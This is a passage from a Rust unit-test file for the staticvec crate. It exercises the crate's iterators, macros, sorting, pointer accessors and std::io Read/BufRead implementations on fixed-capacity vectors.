assert_eq!(v.iter().nth_back(v.len()), None);
}
#[test]
fn iter_rev_nth() {
let v = staticvec![0, 1, 2, 3, 4];
for i in 0..v.len() {
assert_eq!(v.iter().rev().nth(i).unwrap(), &v[v.len() - 1 - i]);
}
assert_eq!(v.iter().rev().nth(v.len()), None);
}
#[test]
fn iter_rev_nth_back() {
let v = staticvec![0, 1, 2, 3, 4];
for i in 0..v.len() {
assert_eq!(v.iter().rev().nth_back(i).unwrap(), &v[i]);
}
assert_eq!(v.iter().rev().nth_back(v.len()), None);
}
#[test]
fn iter_mut() {
let mut v = staticvec![1, 2, 3, 4, 5];
let mut i = v.iter_mut();
assert_eq!(*i.next().unwrap(), 1);
assert_eq!(*i.next_back().unwrap(), 5);
assert_eq!("StaticVecIterMut([2, 3, 4])", format!("{:?}", i));
assert_eq!(*i.next().unwrap(), 2);
assert_eq!(*i.next_back().unwrap(), 4);
assert_eq!("StaticVecIterMut([3])", format!("{:?}", i));
assert_eq!(*i.next().unwrap(), 3);
assert_eq!("StaticVecIterMut([])", format!("{:?}", i));
let mut v2 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let it2 = v2.iter_mut();
assert_eq!(it2.as_slice(), &[ZST {}, ZST {}, ZST {}, ZST {}]);
}
#[test]
fn iter_mut_nth() {
let mut v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.iter_mut();
assert_eq!(i3.nth(2).unwrap(), &mut ZST {});
assert_eq!(i3.as_slice(), &mut [ZST {}]);
assert_eq!(i3.nth(0).unwrap(), &mut ZST {});
assert_eq!(i3.nth(0), None);
let mut v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.iter_mut();
assert_eq!(i4.nth(2).unwrap(), &mut 3);
assert_eq!(i4.as_slice(), &mut [4]);
assert_eq!(i4.nth(0).unwrap(), &mut 4);
assert_eq!(i4.nth(0), None);
let mut xs = staticvec![0, 1, 2, 3, 4, 5];
for (i, &mut x) in xs.iter_mut().enumerate() {
assert_eq!(i, x);
}
let mut it = xs.iter_mut().enumerate();
while let Some((i, &mut x)) = it.nth(0) {
assert_eq!(i, x);
}
let mut it = xs.iter_mut().enumerate();
while let Some((i, &mut x)) = it.nth(1) {
assert_eq!(i, x);
}
let (i, &mut x) = xs.iter_mut().enumerate().nth(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 3);
let mut xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.iter_mut();
assert_eq!(it5.nth(2).unwrap(), &mut vec![3]);
assert_eq!(it5.as_slice(), &[vec![4], vec![5]]);
assert_eq!(it5.next().unwrap(), &mut vec![4]);
assert_eq!(it5.next_back().unwrap(), &mut vec![5]);
assert_eq!(it5.nth(0), None);
let mut xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.iter_mut();
let o = it6.nth(2);
assert_eq!(format!("{:?}", o), "Some([3, 3])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIterMut([[4, 4], [5, 5], [6, 6]])"
);
let mut xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.iter_mut();
let o = it7.nth(5);
assert_eq!(format!("{:?}", o), "Some([6, 6])");
assert_eq!(format!("{:?}", it7), "StaticVecIterMut([])");
}
#[test]
fn iter_mut_nth_back() {
let mut v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.iter_mut();
assert_eq!(i3.nth_back(2).unwrap(), &mut ZST {});
assert_eq!(i3.as_slice(), &mut [ZST {}]);
assert_eq!(i3.nth_back(0).unwrap(), &mut ZST {});
assert_eq!(i3.nth_back(0), None);
let mut v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.iter_mut();
assert_eq!(i4.nth_back(2).unwrap(), &mut 2);
assert_eq!(i4.as_slice(), &[1]);
assert_eq!(i4.nth_back(0).unwrap(), &mut 1);
assert_eq!(i4.nth_back(0), None);
let mut xs = staticvec![0, 1, 2, 3, 4, 5];
let mut it = xs.iter_mut().enumerate();
while let Some((i, &mut x)) = it.nth_back(0) {
assert_eq!(i, x);
}
let mut it = xs.iter_mut().enumerate();
while let Some((i, &mut x)) = it.nth_back(1) {
assert_eq!(i, x);
}
let (i, &mut x) = xs.iter_mut().enumerate().nth_back(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 2);
let mut xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.iter_mut();
assert_eq!(it5.nth_back(1).unwrap(), &mut vec![4]);
assert_eq!(it5.as_slice(), &[vec![1], vec![2], vec![3]]);
assert_eq!(it5.next().unwrap(), &mut vec![1]);
assert_eq!(it5.next_back().unwrap(), &mut vec![3]);
assert_eq!(it5.nth_back(0).unwrap(), &mut vec![2]);
let mut xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.iter_mut();
let o = it6.nth_back(2);
assert_eq!(format!("{:?}", o), "Some([4, 4])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIterMut([[1, 1], [2, 2], [3, 3]])"
);
let mut xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.iter_mut();
let o = it7.nth_back(5);
assert_eq!(format!("{:?}", o), "Some([1, 1])");
assert_eq!(format!("{:?}", it7), "StaticVecIterMut([])");
}
#[test]
fn into_inner() {
// Someone ELI5 why "box syntax" isn't more widely used... If I'd known about it sooner I'd
// never once have used `Box::new()` in any of these tests (something I now feel I'm
// ultimately going to want to go back and change to just `box` at some point for each of them).
let v: StaticVec<Box<i32>, 12> = staticvec![
box 1, box 2, box 3, box 4, box 5, box 6, box 7, box 8, box 9, box 10, box 11, box 12
];
let z = v.into_inner();
assert!(z.is_ok());
assert_eq!(
z.unwrap(),
[box 1, box 2, box 3, box 4, box 5, box 6, box 7, box 8, box 9, box 10, box 11, box 12]
);
let vv: StaticVec<Vec<Vec<u32>>, 4> =
staticvec![vec![vec![1]], vec![vec![2]], vec![vec![3]], vec![vec![4]]];
let zz = vv.into_inner();
assert!(zz.is_ok());
assert_eq!(
zz.unwrap(),
[vec![vec![1]], vec![vec![2]], vec![vec![3]], vec![vec![4]]]
);
let mut vvv = staticvec![box 9, box 1, box 1];
vvv.pop();
let zzz = vvv.into_inner();
assert!(zzz.is_err());
}
#[test]
fn into_iter() {
let v = staticvec![1, 2, 3, 4, 5];
let mut i = v.into_iter();
assert_eq!(i.next().unwrap(), 1);
assert_eq!(i.next_back().unwrap(), 5);
assert_eq!("StaticVecIntoIter([2, 3, 4])", format!("{:?}", i));
assert_eq!(i.next().unwrap(), 2);
assert_eq!(i.next_back().unwrap(), 4);
assert_eq!("StaticVecIntoIter([3])", format!("{:?}", i));
assert_eq!(i.next().unwrap(), 3);
assert_eq!("StaticVecIntoIter([])", format!("{:?}", i));
let v2 = staticvec![
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" })
];
let mut i2 = v2.into_iter();
assert_eq!(i2.next().unwrap(), Box::new(Struct { s: "AAA" }));
assert_eq!(i2.next().unwrap(), Box::new(Struct { s: "BBB" }));
assert_eq!(i2.next().unwrap(), Box::new(Struct { s: "CCC" }));
assert_eq!("StaticVecIntoIter([])", format!("{:?}", i2));
let v3 = staticvec![
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" })
];
let mut i3 = v3.into_iter();
// We do this so Miri can make sure it drops the remaining values properly.
i3.next();
let v4 = staticvec![ZST {}, ZST {}, ZST {}];
let mut i4 = v4.into_iter();
// We do this so Miri can make sure it drops the remaining values properly.
i4.next();
let v5 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut it5 = v5.into_iter();
assert_eq!(it5.as_slice(), &[ZST {}, ZST {}, ZST {}, ZST {}]);
assert_eq!(it5.as_mut_slice(), &mut [ZST {}, ZST {}, ZST {}, ZST {}]);
}
#[test]
fn into_iter_nth() {
let v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.into_iter();
assert_eq!(i3.nth(2).unwrap(), ZST {});
assert_eq!(i3.as_slice(), [ZST {}]);
assert_eq!(i3.nth(0).unwrap(), ZST {});
assert_eq!(i3.nth(0), None);
assert_eq!(i3.nth(0), None);
let v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.into_iter();
assert_eq!(i4.nth(2).unwrap(), 3);
assert_eq!(i4.as_slice(), [4]);
assert_eq!(i4.nth(0).unwrap(), 4);
assert_eq!(i4.nth(0), None);
assert_eq!(i4.nth(0), None);
let xs1 = staticvec![0, 1, 2, 3, 4, 5];
for (i, x) in xs1.into_iter().enumerate() {
assert_eq!(i, x);
}
let xs2 = staticvec![0, 1, 2, 3, 4, 5];
let mut it2 = xs2.into_iter().enumerate();
while let Some((i, x)) = it2.nth(0) {
assert_eq!(i, x);
}
let xs3 = staticvec![0, 1, 2, 3, 4, 5];
let mut it3 = xs3.into_iter().enumerate();
while let Some((i, x)) = it3.nth(1) {
assert_eq!(i, x);
}
let xs4 = staticvec![0, 1, 2, 3, 4, 5];
let (i, x) = xs4.into_iter().enumerate().nth(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 3);
// We use "StaticVecs of Vec" below to test the functionality for non-trivial "need Drop" types.
let xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.into_iter();
assert_eq!(it5.nth(2).unwrap(), vec![3]);
assert_eq!(it5.as_slice(), &[vec![4], vec![5]]);
assert_eq!(it5.next().unwrap(), vec![4]);
assert_eq!(it5.next_back().unwrap(), vec![5]);
assert_eq!(it5.nth(0), None);
let xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.into_iter();
let o = it6.nth(2);
assert_eq!(format!("{:?}", o), "Some([3, 3])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIntoIter([[4, 4], [5, 5], [6, 6]])"
);
let xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.into_iter();
let o = it7.nth(5);
assert_eq!(format!("{:?}", o), "Some([6, 6])");
assert_eq!(format!("{:?}", it7), "StaticVecIntoIter([])");
}
#[test]
fn into_iter_nth_back() {
let v3 = staticvec![ZST {}, ZST {}, ZST {}, ZST {}];
let mut i3 = v3.into_iter();
assert_eq!(i3.nth_back(2).unwrap(), ZST {});
assert_eq!(i3.as_slice(), [ZST {}]);
assert_eq!(i3.nth_back(0).unwrap(), ZST {});
assert_eq!(i3.nth_back(0), None);
assert_eq!(i3.nth_back(0), None);
let v4 = staticvec![1, 2, 3, 4];
let mut i4 = v4.into_iter();
assert_eq!(i4.nth_back(2).unwrap(), 2);
assert_eq!(i4.as_slice(), [1]);
assert_eq!(i4.nth_back(0).unwrap(), 1);
assert_eq!(i4.nth_back(0), None);
assert_eq!(i4.nth_back(0), None);
let xs1 = staticvec![0, 1, 2, 3, 4, 5];
let mut it1 = xs1.into_iter().enumerate();
while let Some((i, x)) = it1.nth_back(0) {
assert_eq!(i, x);
}
let xs2 = staticvec![0, 1, 2, 3, 4, 5];
let mut it2 = xs2.into_iter().enumerate();
while let Some((i, x)) = it2.nth_back(1) {
assert_eq!(i, x);
}
let xs3 = staticvec![0, 1, 2, 3, 4, 5];
let (i, x) = xs3.into_iter().enumerate().nth_back(3).unwrap();
assert_eq!(i, x);
assert_eq!(i, 2);
// We use "StaticVecs of Vec" below to test the functionality for non-trivial "need Drop" types.
let xs5 = staticvec![vec![1], vec![2], vec![3], vec![4], vec![5]];
let mut it5 = xs5.into_iter();
assert_eq!(it5.nth_back(1).unwrap(), vec![4]);
assert_eq!(it5.as_slice(), &[vec![1], vec![2], vec![3]]);
assert_eq!(it5.next().unwrap(), vec![1]);
assert_eq!(it5.next_back().unwrap(), vec![3]);
assert_eq!(it5.nth_back(0).unwrap(), vec![2]);
let xs6 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it6 = xs6.into_iter();
let o = it6.nth_back(2);
assert_eq!(format!("{:?}", o), "Some([4, 4])");
assert_eq!(
format!("{:?}", it6),
"StaticVecIntoIter([[1, 1], [2, 2], [3, 3]])"
);
let xs7 = staticvec![
vec![1, 1],
vec![2, 2],
vec![3, 3],
vec![4, 4],
vec![5, 5],
vec![6, 6]
];
let mut it7 = xs7.into_iter();
let o = it7.nth_back(5);
assert_eq!(format!("{:?}", o), "Some([1, 1])");
assert_eq!(format!("{:?}", it7), "StaticVecIntoIter([])");
}
#[cfg(feature = "std")]
#[test]
fn into_vec() {
let v = staticvec![
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" })
];
let vv = v.into_vec();
assert_eq!(vv.capacity(), 3);
assert_eq!(vv.len(), 3);
}
#[test]
fn last() {
let v = staticvec![1, 2, 3];
assert_eq!(*v.last().unwrap(), 3);
}
#[test]
fn last_mut() {
let mut v = staticvec![1, 2, 3];
assert_eq!(*v.last_mut().unwrap(), 3);
}
#[test]
fn len() {
let a = staticvec![1, 2, 3];
assert_eq!(a.len(), 3);
}
#[test]
fn macros() {
let v = staticvec![staticvec![staticvec![1, 2, 3, 4]]];
assert_eq!(v[0][0], [1, 2, 3, 4]);
let v2 = staticvec![12.0; 64];
assert!(v2 == [12.0; 64]);
const V3: StaticVec<i32, 4> = staticvec![1, 2, 3, 4];
assert_eq!(V3, [1, 2, 3, 4]);
const V4: StaticVec<i32, 128> = staticvec![27; 128];
assert!(V4 == [27; 128]);
static V: StaticVec<f64, 3> = sortedstaticvec!(f64, [16.0, 15.0, 14.0]);
assert_eq!(V, [14.0, 15.0, 16.0]);
assert_eq!(V.reversed().drain(0..1), [16.0]);
static VV: StaticVec<f64, 0> = sortedstaticvec!(f64, []);
assert_eq!(VV, []);
// Test trailing commas
assert_eq!(staticvec![1, 2, 3, 4,], staticvec![1, 2, 3, 4]);
}
#[test]
fn math_functions() {
static A: StaticVec<f64, 4> = staticvec![4.0, 5.0, 6.0, 7.0];
static B: StaticVec<f64, 4> = staticvec![2.0, 3.0, 4.0, 5.0];
assert_eq!(A.added(&B), [6.0, 8.0, 10.0, 12.0]);
assert_eq!(A.subtracted(&B), [2.0, 2.0, 2.0, 2.0]);
assert_eq!(A.multiplied(&B), [8.0, 15.0, 24.0, 35.0]);
assert_eq!(A.divided(&B), [2.0, 1.6666666666666667, 1.5, 1.4]);
}
#[test]
fn mut_ptr_at() {
let mut v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.mut_ptr_at(0), 1) };
unsafe { assert_eq!(*v.mut_ptr_at(1), 2) };
unsafe { assert_eq!(*v.mut_ptr_at(2), 3) };
}
#[test]
fn mut_ptr_at_unchecked() {
let mut v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.mut_ptr_at_unchecked(0), 1) };
unsafe { assert_eq!(*v.mut_ptr_at_unchecked(1), 2) };
unsafe { assert_eq!(*v.mut_ptr_at_unchecked(2), 3) };
}
#[test]
fn new() {
let v = StaticVec::<i32, 1>::new();
assert_eq!(v.capacity(), 1);
}
#[test]
fn new_from_array() {
let vec = StaticVec::<i32, 3>::new_from_array([1; 3]);
assert_eq!(vec, [1, 1, 1]);
let vec2 = StaticVec::<i32, 3>::new_from_array([1; 6]);
assert_eq!(vec2, [1, 1, 1]);
let vec3 = StaticVec::<i32, 27>::new_from_array([0; 0]);
assert_eq!(vec3, []);
let vec4 = StaticVec::<f32, 1024>::new_from_array([24.0; 512]);
assert_eq!(vec4, staticvec![24.0; 512]);
let v = StaticVec::<i32, 3>::new_from_array([1, 2, 3]);
assert_eq!(v, [1, 2, 3]);
let v2 = StaticVec::<i32, 3>::new_from_array([1, 2, 3, 4, 5, 6]);
assert_eq!(v2, [1, 2, 3]);
let v5 = StaticVec::<Box<Struct>, 2>::new_from_array([
Box::new(Struct { s: "AAA" }),
Box::new(Struct { s: "BBB" }),
Box::new(Struct { s: "CCC" }),
Box::new(Struct { s: "DDD" }),
Box::new(Struct { s: "EEE" }),
]);
assert_eq!(
v5,
[Box::new(Struct { s: "AAA" }), Box::new(Struct { s: "BBB" })]
);
}
#[test]
fn new_from_const_array() {
const VEC2: StaticVec<i32, 6> = StaticVec::new_from_const_array([1; 6]);
assert_eq!(VEC2, [1, 1, 1, 1, 1, 1]);
const VEC3: StaticVec<i32, 0> = StaticVec::new_from_const_array([0; 0]);
assert_eq!(VEC3, []);
const VEC4: StaticVec<f32, 512> = StaticVec::new_from_const_array([24.0; 512]);
assert_eq!(VEC4, staticvec![24.0; 512]);
const V: StaticVec<&'static str, 3> = StaticVec::new_from_const_array(["A", "B", "C"]);
assert_eq!(V.reversed(), ["C", "B", "A"]);
const V2: StaticVec<u8, 6> = StaticVec::new_from_const_array([1, 2, 3, 4, 5, 6]);
assert_eq!(V2, [1, 2, 3, 4, 5, 6]);
const V6: StaticVec<Struct, 3> = StaticVec::new_from_const_array([
Struct { s: "AAA" },
Struct { s: "BBB" },
Struct { s: "CCC" },
]);
assert_eq!(
V6,
[
Struct { s: "AAA" },
Struct { s: "BBB" },
Struct { s: "CCC" },
]
);
}
#[test]
fn new_from_slice() {
let vec = StaticVec::<i32, 3>::new_from_slice(&[1, 2, 3]);
assert_eq!(vec, [1, 2, 3]);
let vec2 = StaticVec::<i32, 3>::new_from_slice(&[1, 2, 3, 4, 5, 6]);
assert_eq!(vec2, [1, 2, 3]);
let vec3 = StaticVec::<i32, 27>::new_from_slice(&[]);
assert_eq!(vec3, []);
}
#[test]
fn partial_eq() {
assert_eq!(StaticVec::<i32, 0>::new(), [0; 0]);
assert_eq!(StaticVec::<i32, 0>::new(), []);
assert_eq!(StaticVec::<i32, 0>::new(), &[]);
assert_eq!(StaticVec::<i32, 0>::new(), &mut []);
assert_eq!(StaticVec::<i32, 0>::new(), StaticVec::<i32, 0>::new());
assert_eq!(StaticVec::<i32, 0>::new(), &StaticVec::<i32, 0>::new());
assert_eq!(StaticVec::<i32, 0>::new(), &mut StaticVec::<i32, 0>::new());
// assert_eq! is written in a way that's limited by LengthAtMost32, so I can't
// use it for the next part.
if staticvec![1; 64] != [1; 64] {
panic!();
}
if &staticvec![1; 64] != [1; 64] {
panic!();
}
if &mut staticvec![1; 64] != [1; 64] {
panic!();
}
if staticvec![1; 64] != &[1; 64] {
panic!();
}
if staticvec![1; 64] != &mut [1; 64] {
panic!();
}
if staticvec![1; 64] != staticvec![1; 64] {
panic!();
}
if staticvec![1; 64] != &staticvec![1; 64] {
panic!();
}
if staticvec![1; 64] != &mut staticvec![1; 64] {
panic!();
}
}
#[test]
fn partial_ord() {
assert!(staticvec![1] < staticvec![2]);
assert!(staticvec![1] > []);
assert!(staticvec![1] <= &staticvec![2]);
assert!(staticvec![1] >= &[]);
assert!(staticvec![1] > &mut []);
assert!(staticvec![vec![1], vec![2]] < staticvec![vec![1], vec![2], vec![3]]);
assert!(staticvec![vec![1]] > []);
assert!(staticvec![vec![1]] <= &staticvec![vec![2]]);
assert!(staticvec![vec![1]] >= &[]);
assert!(staticvec![vec![1]] > &mut []);
}
#[test]
fn pop() {
let mut vec = staticvec![1, 2, 3];
assert_eq!(vec.pop(), Some(3));
assert_eq!(vec, [1, 2]);
}
#[test]
fn ptr_at() {
let v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.ptr_at(0), 1) };
unsafe { assert_eq!(*v.ptr_at(1), 2) };
unsafe { assert_eq!(*v.ptr_at(2), 3) };
}
#[test]
fn ptr_at_unchecked() {
let v = staticvec![1, 2, 3];
unsafe { assert_eq!(*v.ptr_at_unchecked(0), 1) };
unsafe { assert_eq!(*v.ptr_at_unchecked(1), 2) };
unsafe { assert_eq!(*v.ptr_at_unchecked(2), 3) };
}
#[test]
fn push() {
let mut vec = StaticVec::<i32, 4>::new_from_slice(&[1, 2, 3]);
vec.push(3);
assert_eq!(vec, [1, 2, 3, 3]);
}
#[test]
fn quicksorted_unstable() {
const V: StaticVec<StaticVec<i32, 3>, 2> = staticvec![staticvec![1, 2, 3], staticvec![6, 5, 4]];
assert_eq!(
V.iter()
.flatten()
.collect::<StaticVec<i32, 6>>()
.quicksorted_unstable(),
[1, 2, 3, 4, 5, 6]
);
let v2 = StaticVec::<i32, 128>::new();
assert_eq!(v2.quicksorted_unstable(), []);
assert_eq!(staticvec![2, 1].quicksorted_unstable(), [1, 2]);
}
#[test]
fn quicksort_unstable() {
let v1 = staticvec![staticvec![1, 2, 3], staticvec![6, 5, 4]];
let mut v2 = v1.iter().flatten().collect::<StaticVec<i32, 6>>();
v2.quicksort_unstable();
assert_eq!(v2, [1, 2, 3, 4, 5, 6]);
let mut v3 = StaticVec::<i32, 128>::new();
v3.quicksort_unstable();
assert_eq!(v3, []);
let mut v4 = staticvec![2, 1];
v4.quicksort_unstable();
assert_eq!(v4, [1, 2]);
}
#[cfg(feature = "std")]
mod read_tests {
use staticvec::*;
use std::io::{self, BufRead, Read};
// We provide custom implementations of most `Read` methods; test those
// impls
#[test]
fn read() {
let mut ints = staticvec![1, 2, 3, 4, 6, 7, 8, 9, 10];
let mut buffer = [0, 0, 0, 0];
assert_eq!(ints.read(&mut buffer).unwrap(), 4);
assert_eq!(buffer, [1, 2, 3, 4]);
let mut buffer2 = [];
assert_eq!(ints.read(&mut buffer2).unwrap(), 0);
assert_eq!(buffer2, []);
let mut buffer3 = staticvec![0; 9];
assert_eq!(ints.read(buffer3.as_mut_slice()).unwrap(), 5);
assert_eq!(ints, []);
assert_eq!(ints.read(buffer3.as_mut_slice()).unwrap(), 0);
assert_eq!(ints, []);
assert_eq!(ints.read(staticvec![].as_mut_slice()).unwrap(), 0);
}
#[test]
fn read_to_end() {
let mut ints = staticvec![1, 2, 3, 4, 5, 6, 7];
let mut buffer = vec![2, 3];
assert_eq!(ints.read_to_end(&mut buffer).unwrap(), 7);
assert_eq!(ints, &[]);
assert_eq!(buffer, &[2, 3, 1, 2, 3, 4, 5, 6, 7]);
}
#[test]
fn read_to_string() {
// Hello world in ascii
let mut input = StaticVec::<u8, 30>::new_from_slice(b"World!");
let mut dest = String::from("Hello, ");
assert_eq!(input.read_to_string(&mut dest).unwrap(), 6);
assert_eq!(dest, "Hello, World!");
assert_eq!(input, &[]);
}
#[test]
fn read_to_string_failure() {
// Invalid UTF-8 bytes
let mut input = staticvec![0b1101_1010, 0b1100_0000];
let mut dest = String::new();
let err = input.read_to_string(&mut dest).unwrap_err();
assert_eq!(err.kind(), io::ErrorKind::InvalidData);
}
#[test]
fn read_exact() {
let mut ints = staticvec![1, 2, 3, 4, 6, 7, 8, 9, 10];
let mut buffer = [0, 0, 0, 0];
ints.read_exact(&mut buffer).unwrap();
assert_eq!(buffer, [1, 2, 3, 4]);
assert_eq!(ints, &[6, 7, 8, 9, 10]);
let mut buffer2 = [0, 0, 0, 0, 0, 0, 0, 0];
let err = ints.read_exact(&mut buffer2).unwrap_err();
assert_eq!(err.kind(), io::ErrorKind::UnexpectedEof);
}
#[test]
fn read_vectored() {
let mut ints = staticvec![1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12];
let mut buf1 = [0; 4];
let mut buf2 = [0; 4];
let mut buf3 = [0; 4];
let mut bufs = [
io::IoSliceMut::new(&mut buf1),
io::IoSliceMut::new(&mut buf2),
io::IoSliceMut::new(&mut buf3),
];
assert_eq!(ints.read_vectored(&mut bufs).unwrap(), 12);
assert_eq!(
"[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]",
format!("{:?}", bufs)
);
assert_eq!(ints, []);
let mut ints2 = staticvec![1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12];
let mut buf4 = [0; 2];
let mut buf5 = [0; 3];
let mut buf6 = [0; 4];
let mut bufs2 = [
io::IoSliceMut::new(&mut buf4),
io::IoSliceMut::new(&mut buf5),
io::IoSliceMut::new(&mut buf6),
];
assert_eq!(ints2.read_vectored(&mut bufs2).unwrap(), 9);
assert_eq!("[[1, 2], [3, 4, 5], [6, 7, 8, 9]]", format!("{:?}", bufs2));
assert_eq!(ints2, [10, 11, 12]);
}
#[test]
fn bufread() {
let mut cursor = StaticVec::<u8, 7>::from("foo\nbar".as_bytes());
let mut buf = String::new();
let num_bytes = cursor
.read_line(&mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 4);
assert_eq!(buf, "foo\n");
buf.clear();
let num_bytes = cursor
.read_line(&mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 3);
assert_eq!(buf, "bar");
buf.clear();
let num_bytes = cursor
.read_line(&mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 0);
assert_eq!(buf, "");
let cursor2 = StaticVec::<u8, 18>::from("lorem\nipsum\r\ndolor".as_bytes());
let mut lines_iter = cursor2.lines().map(|l| l.unwrap());
assert_eq!(lines_iter.next(), Some(String::from("lorem")));
assert_eq!(lines_iter.next(), Some(String::from("ipsum")));
assert_eq!(lines_iter.next(), Some(String::from("dolor")));
assert_eq!(lines_iter.next(), None);
let mut cursor3 = StaticVec::<u8, 11>::from("lorem-ipsum".as_bytes());
let mut buf = vec![];
let num_bytes = cursor3
.read_until(b'-', &mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 6);
assert_eq!(buf, b"lorem-");
buf.clear();
let num_bytes = cursor3
.read_until(b'-', &mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 5);
assert_eq!(buf, b"ipsum");
buf.clear();
let num_bytes = cursor3
.read_until(b'-', &mut buf)
.expect("reading from cursor won't fail");
assert_eq!(num_bytes, 0);
assert_eq!(buf, b"");
let cursor4 = StaticVec::<u8, 17>::from("lorem-ipsum-dolor".as_bytes());
let mut split_iter = cursor4.split(b'-').map(|l| l.unwrap());
assert_eq!(split_iter.next(), Some(b"lorem".to_vec()));
assert_eq!(split_iter.next(), Some(b"ipsum".to_vec()));
assert_eq!(split_iter.next(), Some(b"dolor".to_vec()));
assert_eq!(split_iter.next(), None);
}
}
#[test]
fn remaining_capacity() {
let mut v = StaticVec::<i32, 3>::new();
v.push(12);
assert_eq!(v.remaining_capacity(), 2);
}
#[test]
fn remove() {
let mut v = staticvec![1, 2, 3];
assert_eq!(v.remove(1), 2);
assert_eq!(v, [1, 3]);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic]
fn remove_panic() {
let mut v = staticvec![1, 2, 3];
v.remove(128);
}
#[test]
fn remove_item() {
let mut vec = staticvec![1, 2, 3, 1];
vec.remove_item(&1);
assert_eq!(vec, staticvec![2, 3, 1]);
}
#[test]
fn retain() {
let mut vec = staticvec![1, 2, 3, 4, 5];
let keep = [false, true, true, false, true];
let mut i = 0;
vec.retain(|_| (keep[i], i += 1).0);
assert_eq!(vec, [2, 3, 5]);
}
#[test]
fn reversed() {
let v = staticvec![1, 2, 3].reversed();
assert!(v == [3, 2, 1]);
let mut x = StaticVec::<f64, 24>::new();
let mut y = StaticVec::<f64, 12>::new();
for _ in 0..12 {
y.push(12.0);
}
x.append(&mut y);
assert_eq!(x.reversed().len(), 12);
assert_eq!(
x.reversed(),
[12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0, 12.0]
);
}
#[test]
fn size_in_bytes() {
let x = StaticVec::<u8, 8>::from([1, 2, 3, 4, 5, 6, 7, 8]);
assert_eq!(x.size_in_bytes(), 8);
let y = StaticVec::<u16, 8>::from([1, 2, 3, 4, 5, 6, 7, 8]);
assert_eq!(y.size_in_bytes(), 16);
let z = StaticVec::<u32, 8>::from([1, 2, 3, 4, 5, 6, 7, 8]);
assert_eq!(z.size_in_bytes(), 32);
let w = StaticVec::<u64, 8>::from([1, 2, 3, 4, 5, 6, 7, 8]);
assert_eq!(w.size_in_bytes(), 64);
}
#[test]
fn set_len() {
let mut v = staticvec![1, 2, 3];
assert_eq!(v.len(), 3);
unsafe { v.set_len(0) };
assert_eq!(v.len(), 0);
}
#[cfg(feature = "std")]
#[test]
fn sorted() {
const V: StaticVec<StaticVec<i32, 3>, 2> = staticvec![staticvec![1, 2, 3], staticvec![6, 5, 4]];
assert_eq!(
V.iter().flatten().collect::<StaticVec<i32, 6>>().sorted(),
[1, 2, 3, 4, 5, 6]
);
let v2 = StaticVec::<i32, 128>::new();
assert_eq!(v2.sorted(), []);
assert_eq!(staticvec![2, 1].sorted(), [1, 2]);
}
#[test]
fn sorted_unstable() {
const V: StaticVec<StaticVec<i32, 3>, 2> = staticvec![staticvec![1, 2, 3], staticvec![6, 5, 4]];
assert_eq!(
V.iter()
.flatten()
.collect::<StaticVec<i32, 6>>()
.sorted_unstable(),
[1, 2, 3, 4, 5, 6]
);
let v2 = StaticVec::<i32, 128>::new();
assert_eq!(v2.sorted_unstable(), []);
assert_eq!(staticvec![2, 1].sorted_unstable(), [1, 2]);
}
#[test]
fn split_off() {
let mut vec = staticvec![1, 2, 3];
let vec2 = vec.split_off(1);
assert_eq!(vec, [1]);
assert_eq!(vec2, [2, 3]);
}
#[cfg_attr(all(windows, miri), ignore)]
#[test]
#[should_panic]
fn split_off_assert() {
let mut vec3 = StaticVec::<i32, 0>::new();
assert_eq!(vec3.split_off(9000), []);
}
/*
#[test]
fn symmetric_difference() {
